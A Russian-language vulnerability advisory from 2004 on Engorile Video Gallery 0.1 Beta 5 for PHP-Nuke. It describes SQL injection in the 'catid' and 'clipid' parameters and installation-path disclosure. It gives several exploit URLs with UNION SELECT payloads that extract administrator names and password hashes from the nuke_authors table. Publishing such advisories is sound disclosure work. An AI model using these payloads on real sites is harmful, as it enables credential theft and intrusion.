Несколько уязвимостей в Engorile Video Gallery

Дата публикации:
28.04.2004
Всего просмотров:
995
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Engorile Video Gallery 0.1 Beta 5

Описание: Несколько уязвимостей обнаружено в Engorile Video Gallery. Удаленный пользователь может внедрить SQL команды, которые будут выполнены на основной базе данных. Удаленный пользователь может также определить инсталляционный путь.

Программа не достаточно проверяет правильность данных, представленных пользователем в параметрах 'catid' и 'clipid':

http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELE CT%20pwd%20FROM%20nuke_authors&catid=1

http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

http://[tar get]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1

http://[target]/modules.php?name=Video_Gallery&l_op=v oteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
Также удаленный пользователь может определить инсталляционный путь:
http://[target]/modules.php?name =Video_Gallery&l_op=viewcat&catid=darkbicho

http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

URL производителя: http://videogallery.engorile.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities PHP-Nuke Video Gallery Module for PHP-Nuke

или введите имя

CAPTCHA